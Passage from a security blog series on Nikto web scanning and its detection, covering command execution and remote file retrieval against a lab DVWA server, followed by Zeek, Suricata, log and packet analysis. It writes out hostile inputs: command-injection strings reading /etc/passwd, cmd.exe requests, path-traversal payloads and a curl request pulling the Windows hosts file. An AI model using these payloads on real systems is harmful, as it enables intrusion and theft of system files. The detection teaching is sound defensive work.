<span style="color: white;">command=savesetup </span>
<span style="color: white;">/c ver </span>
<span style="color: white;">data=Download </span>
<span style="color: white;">...</span>
<span style="color: white;">name=forums</span>
<span style="color: white;">name=Forums</span>
<span style="color: white;">name=forums</span>
<span style="color: white;">name=Network_Tools</span>
<span style="color: white;">name=Forums</span>
<span style="color: white;">name=PNphpBB2</span>
<span style="color: white;">name=PNphpBB2</span>
<span style="color: white;">Nikto=forums</span>
<span style="color: white;">Nikto=Forums</span>
<span style="color: white;">Nikto=forums</span>
<span style="color: white;">Nikto=Forums</span>
<span style="color: white;">pass= </span>
<span style="color: white;">QALIAS=x</span>
<span style="color: white;">/bin/cat /etc/passwd</span>
<span style="color: white;">Qname=root</span>
<span style="color: white;">cat /etc/passwd </span>
<span style="color: white;">QNikto=root</span>
<span style="color: white;">cat /etc/passwd </span>
<span style="color: white;">query=AAA</span>
<span style="color: white;">realNikto=aaa</span>
<span style="color: white;">-s</span>
<span style="color: white;">sd=ls /etc</span>
<span style="color: white;">realname=aaa</span>
<span style="color: white;">server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF</span>
<span style="color: white;">t=2</span>
<span style="color: white;">t=2</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">WSDL</span>
<span style="color: white;">xsl=/vcs/vcs_home.xsl&cat "/etc/passwd"&</span>
</pre></div>
<br /><div>Not much more to do here. Transitioning to Zeek</div><div><br /></div></div><div><span style="font-size: medium;"><b>Detect - Zeek Analysis</b></span><br /><br />Setup Zeek<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
<div><br /></div>Analyzing<i> http.log</i> file.<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp "\s+\/.*?\s+" --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">grep --perl-regexp '\?.*' --only-matching | grep --invert-match "phpinfo" | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">cut --fields=2- --delimiter='?' | awk --field-separator='HTTP' '{ print $1 }' | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort --unique | awk --field-separator=' ' '{ system("urlencode -d "$1) }'</span>
<span style="color: white;">aaaaaaaa</span>
<span style="color: white;">uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(wireshark),121(bluetooth),133(scanner),141(vboxsf),142(kaboxer),147(docker)</span>
<span style="color: white;">action=load</span>
<span style="color: white;">action=modify_user</span>
<span style="color: white;">...</span>
<span style="color: white;">sd=ls</span>
<span style="color: white;">server=repserv report=/tmp/hacker.rdf destype=cache desformat=PDF</span>
<span style="color: white;">sh: 1: Syntax error: "(" unexpected</span>
<span style="color: white;">t=2</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">type=Library</span>
<span style="color: white;">user=cpanel</span>
<span style="color: white;">user_id=1</span>
<span style="color: white;">-v</span>
<span style="color: white;">WSDL</span>
<span style="color: white;">x0acatx0a/etc/passwdx0a</span>
</pre></div>
</div><div><br /></div><div><div>The above information is the same that was seen in the log and packet analysis sections. Difference being it was extracted from the <i>http.log</i> file of Zeek.</div></div><div><br /></div><div><div><b><span style="font-size: medium;">Detect - Suricata (IDS) Analysis</span></b></div><div><br />Setup Suricata to operate in IDS mode<br /><br /><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[/var/log/suricata]</span>
<span style="color: white;">└─$ sudo suricata -c /etc/suricata/suricata.yaml -s /var/lib/suricata/rules/suricata.rules -i eth0 -l /var/log/suricata/ --simulate-ips -k all</span>
</pre></div>
<br />Wrap this up with suricata.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ cat fast.log | cut --fields=3 --delimiter='[' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=5 </span>
<span style="color: white;"> 45 1:2022028:2] ET WEB_SERVER Possible CVE-2014-6271 Attempt </span>
<span style="color: white;"> 23 1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt </span>
<span style="color: white;"> 22 1:2009362:7] ET WEB_SERVER /system32/ in Uri - Possible Protected Directory Access Attempt </span>
<span style="color: white;"> 14 1:2021390:3] ET WEB_SPECIFIC_APPS WEB-PHP RCE PHPBB 2004-1315 </span>
<span style="color: white;"> 12 1:2100982:12] GPL EXPLOIT unicode directory traversal attempt </span>
</pre></div>
</div><div><br /></div><div><div>The one that we will extract here is the 23 "<i>1:2009361:8] ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt </i>"</div><div><br /></div><div>What is the rule looking for?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_6]</span>
<span style="color: white;">└─$ grep "2009361" /var/lib/suricata/rules/suricata.rules | fmt</span>
<span style="color: white;">alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET</span>
<span style="color: white;">WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt";</span>
<span><span style="color: white;">flow:to_server,established; http.uri; </span><b><span style="color: #fcff01;">content:"/cmd.exe"</span></b><span style="color: white;">; nocase;</span></span>
<span style="color: white;">reference:url,doc.emergingthreats.net/2009361; classtype:attempted-recon;</span>
<span style="color: white;">sid:2009361; rev:8; metadata:created_at 2010_07_30, updated_at</span>
<span style="color: white;">2020_09_14;)</span>
</pre></div>
</div><div><br /></div><div>Rule is looking to ensure the 3-way handshake is completed and that the traffic is going to the server. The server in this case, is the device that sent the <i>SYN-ACK</i> as part of establishing the session during the three-way handshake. It is also looking for the content "<i>/cmd.exe</i>" in the URI. Let's find that packet, where "/cmd.exe" is in the <i>URI</i>. </div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">ALERT CNT: 1</span>
<span style="color: white;">ALERT MSG [00]: ET WEB_SERVER cmd.exe In URI - Possible Command Execution Attempt</span>
<span style="color: white;">ALERT GID [00]: 1</span>
<span style="color: white;">ALERT SID [00]: 2009361</span>
<span style="color: white;">ALERT REV [00]: 8</span>
<span style="color: white;">ALERT CLASS [00]: Attempted Information Leak</span>
<span style="color: white;">ALERT PRIO [00]: 2</span>
<span style="color: white;">ALERT FOUND IN [00]: STATE</span>
<span style="color: white;">ALERT IN TX [00]: 49</span>
<span style="color: white;">PAYLOAD LEN: 211</span>
<span style="color: white;">PAYLOAD:</span>
<span style="color: white;"> 0000 47 45 54 20 2F 63 67 69 2D 62 69 6E 2F </span><span style="color: #fcff01;"><b>63 6D 64</b></span><span><span style="color: white;"> GET /cgi -bin/</span><b><span style="color: #fcff01;">cmd</span></b></span>
<span><span style="color: white;"> 0010 </span><b><span style="color: #fcff01;">2E 65 78 65</span></b><span style="color: white;"> 3F 2F 63 2B 64 69 72 20 48 54 54 50 </span><b><span style="color: #fcff01;">.exe</span></b><span style="color: white;">?/c+ dir HTTP</span></span>
<span style="color: white;"> 0020 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 30 2E 30 /1.1..Ho st: 10.0</span>
<span style="color: white;"> 0030 2E 30 2E 31 30 36 0D 0A 43 6F 6E 6E 65 63 74 69 .0.106.. Connecti</span>
<span style="color: white;"> 0040 6F 6E 3A 20 4B 65 65 70 2D 41 6C 69 76 65 0D 0A on: Keep -Alive..</span>
<span style="color: white;"> 0050 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F 7A 69 User-Age nt: Mozi</span>
<span style="color: white;"> 0060 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 lla/5.0 (Windows</span>
<span style="color: white;"> 0070 20 4E 54 20 31 30 2E 30 3B 20 57 69 6E 36 34 3B NT 10.0 ; Win64;</span>
<span style="color: white;"> 0080 20 78 36 34 29 20 41 70 70 6C 65 57 65 62 4B 69 x64) Ap pleWebKi</span>
<span style="color: white;"> 0090 74 2F 35 33 37 2E 33 36 20 28 4B 48 54 4D 4C 2C t/537.36 (KHTML,</span>
<span style="color: white;"> 00A0 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20 43 68 72 like Ge cko) Chr</span>
<span style="color: white;"> 00B0 6F 6D 65 2F 37 34 2E 30 2E 33 37 32 39 2E 31 36 ome/74.0 .3729.16</span>
<span style="color: white;"> 00C0 39 20 53 61 66 61 72 69 2F 35 33 37 2E 33 36 0D 9 Safari /537.36.</span>
<span style="color: white;"> 00D0 0A 0D 0A </span>
</pre></div>
</div><div><br /></div><div>Nothing meaningful left here to review.</div></div></div><div><br /></div><div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-78104038516991653832023-12-12T18:27:00.000-08:002023-12-12T18:44:34.417-08:00Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string<p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From detection perspective, the tools and or processed used for the network forensics are log analysis, TShark, Zeek and Suricata.<br /><br /></p><p><span style="font-size: medium;"><b>The Hack - Remote File Retrieval with evasion type 4 -> Prepend long random string</b></span></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 5 -evasion 4</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Using Encoding: Prepend long random string</span>
<span style="color: white;">+ Start Time: 2023-06-06 15:13:18 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /index.php?download=/winnt/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.</span>
<span style="color: white;">+ /index.php?download=/windows/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.</span>
<span style="color: white;">+ /index.php?download=/etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.</span>
<span style="color: white;">+ /index.php?|=../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.</span>
<span style="color: white;">+ /index.php?page=../../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)</span>
<span style="color: white;">...</span>
<span style="color: white;">+ 925 requests: 0 error(s) and 6 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-06-06 15:13:20 (GMT-4) (2 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Above everything shows <i>302</i>. Hence I'm concluding this test was not successful.</p><p>Besides, we already learned previously that <i>index.php</i> does not have a parameter name "<i>page</i>" and there is none for "<i>download</i>". More importantly, <i>/etc/passwd</i> is found on Linux not Windows so those results are not valid for this purpose.</p><p>Leveraging my knowledge of the DVWA app to actually exploit this. Rather than using the web application directly, I will leverage curl to attempt to read the <i>"c:\windows\system32\drivers\etc\hosts"</i> file.</p><p>If we inspect the page, we see a "<i>page</i>" parameter. By default, the value is "<i>include.php</i>"</p><p><i>http://10.0.0.106/dvwa/vulnerabilities/fi/?page=include.php</i></p><p>Using curl:</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ curl --request GET --location "http://10.0.0.106/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts" </span>
<span style="color: #fcff01;"><b><span># Copyright (c) 1993-2009 Microsoft Corp.</span>
<span># ...</span>
<span># Additionally, comments (such as these) may be inserted on individual</span>
<span># lines or following the machine name denoted by a '#' symbol.</span>
<span>#</span>
<span># For example:</span>
<span>#</span>
<span># 102.54.94.97 rhino.acme.com # source server</span>
<span># 38.25.63.10 x.acme.com # x client host</span>
<span># localhost name resolution is handled within DNS itself.</span>
<span># 127.0.0.1 localhost</span>
<span># ::1 localhost</span>
<span>10.0.0.107 mycooldomain.cdw</span></b></span>
<span style="color: white;"><!DOCTYPE html></span>
<span style="color: white;"><html lang="en-GB"></span>
<span style="color: white;"> <head></span>
<span style="color: white;"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /></span>
<span style="color: white;"> <title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)</title></span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>We can see above, just before the original page loads, the next from the host files.</div><div><br /></div><div>Transitioning to log analysis.</div></div><p><span style="font-size: medium;"><b>Detect - Log Analysis</b></span></p><p>Looking at the first entry in the access.log we see a large set of random characters, prepended to the query.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat access.log | head -1</span>
<span style="color: white;">10.0.0.107 - - [06/Jun/2023:15:12:49 -0400] "GET /P4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmv/../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking for something meaningful. Looking for entries where the response code is 200.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\s+200\s+"</span>
<span style="color: white;">10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHy...JUNK...EkwGH/../favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "TRACE /eaXa8sc4...JUNK...Wlt5N/../ HTTP/1.0" 200 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div>
<p></p><p>Nothing meaningful above. What else is there?</p><p>Looking at the paths. How many were there?</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort --unique | awk --field-separator="HTTP" '{ print $1 }' | wc --lines </span>
<span style="color: white;">667</span>
</pre></div>
</div><div><br /></div><div>Getting a snapshot of some of these.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | sort --unique | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator="HTTP" '{ print $1 }' </span>
<span style="color: white;">./0.alz </span>
<span style="color: white;">../0.cer </span>
<span style="color: white;">../0.egg</span>
<span style="color: white;">...</span>
<span style="color: white;">../autohtml.php?op=modload&mainfile=x&name=/etc/passwd </span>
<span style="color: white;">../backup.alz </span>
<span style="color: white;">...</span>
<span style="color: white;">./cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 </span>
<span style="color: white;">../cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 </span>
<span style="color: white;">../cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 </span>
<span style="color: white;">../cgi-bin/guestbook.cgi </span>
<span style="color: white;">../cgi-bin/helpdesk.cgi </span>
<span style="color: white;">../cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 </span>
<span style="color: white;">../cgi-bin/htgrep?file=index.html&hdr=/etc/passwd </span>
<span style="color: white;">../cgi-bin/htmlscript?../../../../../../../../../../etc/passwd </span>
<span style="color: white;">../cgi-bin/htsearch?exclude=%60/etc/passwd%60 </span>
<span style="color: white;">...</span>
<span style="color: white;">../cgi-bin/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ </span>
<span style="color: white;">../cgi-bin/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\</span>
<span style="color: white;">...</span>
<span style="color: white;">./magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility </span>
<span style="color: white;">../magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml </span>
<span style="color: white;">../magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd </span>
<span style="color: white;">../magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility </span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Moving on to what an actual attack looks like, as we already know from above, there were only 2 entries that returned response code 200.</div><div><br /></div><div>What does the log look like for an actual successful attack?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"</span>
</pre></div>
</div><div><br /></div><div><div>At this point, we need to review the system to see if that file exists. If it does, then you have to wonder what information was exposed. Do note, all systems tend to have a <i>host</i> file and Windows definitely have the host file in that location. Maybe the packet analysis will help to add more clarity.</div></div><div><br /></div><div><br /></div><div><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></div><div><br /></div><div><div>Setup for packet analysis. Capture packets on ports 80,443</div><div><br /></div><div>Get the streams where the response code was 200</div></div><div><br /></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ tshark -n -r tuning_5.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -e tcp.len -E header=y </span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.stream tcp.len</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 4 549</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 8 187</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 9 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Looking at stream 4, we see it is the <i>favicon</i>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span>└─$ tshark -n -r tuning_5.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200\s+" --before-context=7 --after-context=10 </span>
<span style="font-weight: bold;">GET</span> <span>/0RHy...JUNK...kwGH/../favicon.ico</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
1460
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2023 19:12:50 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive</span>
Content-Type: image/x-icon
</pre></div>
</div><div><br /></div><div>Detecting the actual attack via packet analysis</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span><span style="color: white;">
</span><span style="color: white;">└─$ tshark -n -r fi.pcap </span><span style="color: white;">
</span><span style="color: white;"> 1 0.000000000 10.0.0.107 → 10.0.0.106 TCP 74 59456 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1949226976 TSecr=0 WS=128</span><span style="color: white;">
</span><span style="color: white;"> 2 0.000252977 10.0.0.106 → 10.0.0.107 TCP 66 80 → 59456 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM</span><span style="color: white;">
</span><span style="color: white;"> 3 0.000288567 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0</span><span style="color: white;">
</span><span style="color: white;"> 4 0.000369486 10.0.0.107 → 10.0.0.106 HTTP 210 GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1 </span><span style="color: white;">
</span><span style="color: white;"> 5 0.009548711 10.0.0.106 → 10.0.0.107 TCP 1514 </span><span style="color: #fcff01;"><span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span> <span style="font-weight: bold;">200</span></span><span style="color: white;"> </span><span style="color: white;">OK [TCP segment of a reassembled PDU]</span><span style="color: white;">
</span><span style="color: white;">6 0.009548962 10.0.0.106 → 10.0.0.107 TCP 1514 80 → 59456 [ACK] Seq=1461 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]</span><span style="color: white;">
</span><span style="color: white;">7 0.009548998 10.0.0.106 → 10.0.0.107 TCP 1514 80 → 59456 [ACK] Seq=2921 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]</span><span style="color: white;">
</span><span style="color: white;">8 0.009549028 10.0.0.106 → 10.0.0.107 HTTP 125 HTTP/1.1 200 OK (text/html)</span><span style="color: white;">
